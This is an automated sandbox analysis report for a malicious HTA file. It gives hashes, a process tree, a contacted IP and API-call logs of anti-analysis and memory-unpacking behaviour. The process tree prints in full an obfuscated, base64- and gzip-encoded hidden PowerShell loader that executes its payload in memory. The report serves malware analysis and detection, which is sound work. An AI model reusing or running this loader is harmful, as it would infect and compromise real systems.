Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 16, 2024, 2:19 p.m.	Oct. 16, 2024, 2:21 p.m.

Size	7.3KB
Type	HTML document, ASCII text, with very long lines
MD5	`80d63e57cf21fda8b8c90e474eb46a4a`
SHA256	`23d30acfa7336b1bcd1a62a2225f1ad2c2f82f683cf70041874bb9ecfad9dfec`
CRC32	`AB7DC176`
ssdeep	`192:Jn2jh1hqT2jzl46T6erUllgkQaoXIUF6hd9d:Jn2jh1hskrT6erUlikQa3hd9d`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\javad.hta
2544
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
  2636
  - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    2808

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
86.104.74.31	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 16, 2024, 2:19 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 16, 2024, 2:19 p.m.			0	0
IsDebuggerPresent Oct. 16, 2024, 2:19 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522c00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522900 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522a40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522d80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522cc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00522cc0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002056b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205938 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 16, 2024, 2:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00205bf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 16, 2024, 2:19 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 279 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02820000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 16, 2024, 2:19 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
